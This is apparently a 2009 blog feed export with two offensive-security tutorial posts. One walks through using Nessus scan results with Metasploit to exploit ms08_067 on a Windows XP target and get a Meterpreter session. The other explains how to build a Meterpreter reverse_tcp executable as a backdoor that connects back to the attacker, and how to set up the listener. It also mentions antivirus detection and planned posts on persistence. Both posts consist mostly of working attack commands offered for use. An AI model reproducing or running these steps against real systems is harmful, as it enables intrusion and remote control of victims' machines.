tag:blogger.com,1999:blog-85832552068009124822018-03-06T05:47:43.477-05:00Nulbyte SecurityWebsite committed to the security of our technological world.Nulbytehttp://www.blogger.com/profile/02043707611296740457noreply@blogger.comBlogger2125tag:blogger.com,1999:blog-8583255206800912482.post-60072873159148489812009-03-29T16:01:00.009-04:002009-03-31T06:36:06.663-04:00Owning with Nessus and Metasploit<object width="425" height="264"><param name="movie" value="http://www.youtube.com/v/8TqMDzBiM9Q&hl=en&fs=1&rel=0"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/8TqMDzBiM9Q&hl=en&fs=1&rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="264"></embed></object><br /><div align="center"><a href="http://www.youtube.com/watch?v=8TqMDzBiM9Q"> &gt;&gt; View Full Size Video &lt;&lt; </a></div><br /><br />Today I'm going to show you how to use Nessus to create a vulnerability report that Metasploit can use to tell us what our target is vulnerable against. Nessus is not included in Backtrack 4, so you either have to go to <a href="http://nessus.org/">Nessus's Website</a> or use apt-get. The command for apt-get is...<br /><blockquote style="color: rgb(153, 255, 255);">apt-get install nessus nessusd</blockquote>Now that you have nessus installed, you need to run "nessusd" in a terminal window. Nessusd is the server side of nessus and it holds all of the plugins. Nessusd will take quite a while to load up, but once it's done, launch the client side of nessus (found in the menu, or run "nessus" in a terminal).<br /><br /><span style="color: rgb(102, 255, 153);">NOTE</span>: You may have to add a user. Use "nessus-adduser" for this.<br /><br />Now that you have nessus running, in the "Nessusd host" tab, put in the username and password. Now hit "Log in." This should connect nessus to your nessusd server (connecting may take a while). Now go over to the "Target" tab and put in the ip address of your target. Click "Start the scan." After a while, another window will popup with your results. Save them into a file for later (e.g. /root/nessus.nbe).<br /><br />Now open a terminal window and go to your Metaploit Framework directory (Mine is /pentest/exploits/framework3). Now run ./msfconsole. This will give you the Metasploit prompt and now you can create a database to load our nessus nbe file into.<br /><blockquote style="color: rgb(153, 255, 255);">db_create /root/database.db</blockquote>This will create the database in our root folder and connect to it. Now do "db_import_nessus_nbe /root/nessus.nbe" which will load in the nessus scan results.<br /><br />Now do:<br /><blockquote style="color: rgb(153, 255, 255);">db_autopwn -t -x</blockquote>Metasploit will check the file to see what exploits will work against the machine. Now pick one of the exploits. I'm going to be using "windows/smb/ms08_067" against a windows XP SP2 machine. <blockquote style="color: rgb(153, 255, 255);">use windows/smb/ms08_067</blockquote> (change it to your exploit). Set the payload that you want. I'm going to be using Meterpreter. <blockquote><span style="color: rgb(153, 255, 255);">set PAYLOAD windows/meterpreter/bind_tcp</span><br /></blockquote>Now set the ip address of your target in the RHOST variable...<br /><blockquote style="color: rgb(153, 255, 255);">set RHOST 192.168.1.113</blockquote>Now your ready to exploit!<br /><blockquote style="color: rgb(153, 255, 255);">exploit</blockquote>If everything went well, you should now have a Meterpreter session! I've already filmed this tutorial and I'm doing a little post-production work on it and I should have it uploaded tonight. Again, if you need to contact me, you can reach me at nulbyte [-@-] gmail.com.Nulbytehttp://www.blogger.com/profile/02043707611296740457noreply@blogger.com5tag:blogger.com,1999:blog-8583255206800912482.post-71127429903049909572009-03-24T21:52:00.019-04:002009-03-29T16:55:30.687-04:00Meterpreter as a backdoor<object height="264" width="425"><param name="movie" value="http://www.youtube.com/v/BTfOzKACPsY&amp;hl=en&amp;fs=1&amp;rel=0"><param name="allowFullScreen" value="true"><param name="allowscriptaccess" value="always"><embed src="http://www.youtube.com/v/BTfOzKACPsY&amp;hl=en&amp;fs=1&amp;rel=0" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" height="264" width="425"></embed></object><br /><div align="center"><a href="http://www.youtube.com/watch?v=BTfOzKACPsY"> &gt;&gt; View Full Size Video &lt;&lt; </a></div><br /><br />After finding <a href="http://www.vimeo.com/1975301">THIS</a> video on using meterpreter as a backdoor, I knew I had to make a post about it. I had been trying for a few days to get meterpreter to work as a backdoor, and I hadn't had much luck. This video tutorial was the answer to my prayers.<br /><br />Now, I had to watch the video a few times because it was a tad bit confusing (unless you pay close attention). I'm hoping this little walk-through will make it clearer and easier to understand.<br /><br /><br />Step 1: Issue the command:<blockquote style="color: rgb(153, 255, 255);">./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.146 LPORT=5555 X > metexe.exe</blockquote><span style="color: rgb(153, 255, 153);">(TIP: You must first be in your Metasploit Framework folder)</span><br /><br /><span style="color: rgb(255, 102, 102);">(Warning: metexe.exe will be detected by some antiviruses - tested with Antivir)</span><br /><br />Let me explain what this all does, first of all, "./msfpayload" is the application we are going to run. "windows/meterpreter/reverse_tcp" is the payload we want made into a windows binary. "LHOST=192.168.1.146" is a variable holding our (the attacker) IP address. "LPORT=5555" is a variable telling what port to connect back to. "X" (near the end of the command) instructs msfpayload to make it into a windows binary. Finally, "> metexe.exe" tells msfpayload where to save the file.<br /><br />If you did everything correctly, you should now have a file named metexe.exe in the same directory that msfpayload is in (/pentest/exploits/framework3/, for example).<br /><br />This is only half the battle, unfortunately. Sure this will connect back to us, but we don't have anything running on our attacker machine to accept the incoming connection. Let's fix this little problem.<br /><br /><br />Step 2: Start <span style="color: rgb(153, 255, 255);">./msfconsole</span><br /><br />Step 3: Type these commands...<blockquote><br /><span style="color: rgb(153, 255, 255);">use exploit/multi/handler</span><br /><span style="color: rgb(153, 255, 255);">set PAYLOAD windows/meterpreter/reverse_tcp</span><br /><span style="color: rgb(153, 255, 255);">set LHOST 192.168.1.146</span><br /><span style="color: rgb(153, 255, 255);">set LPORT 5555</span><br /><span style="color: rgb(153, 255, 255);">exploit</span></blockquote><br /><br /><span style="color: rgb(153, 255, 153);">(TIP: Be sure to change 192.168.1.146 to your IP address)</span><br /><br />You will notice that this won't actually exploit anything, it will simply create a listener to accept the meterpreter connection. Try putting metexe.exe onto a windows machine (I don't think it works on Vista, yet) and launch it. If all goes smoothly, your listener should tell you that it just received a connection.<br /><br />I'm planning on making three more posts related to Meterpreter in the near future. One on how antiviruses react to the compiled payload (metexe.exe), the second one on how to actually use meterpreter, and the third on how to get meterpreter to run on startup using registry keys. Please note that the future posts are in no particular order and an ETA is not currently available.<br /><br />Again, if you have any questions, comments, or concerns, please email me at nulbytesecurity [-@-] gmail.com.Nulbytehttp://www.blogger.com/profile/02043707611296740457noreply@blogger.com1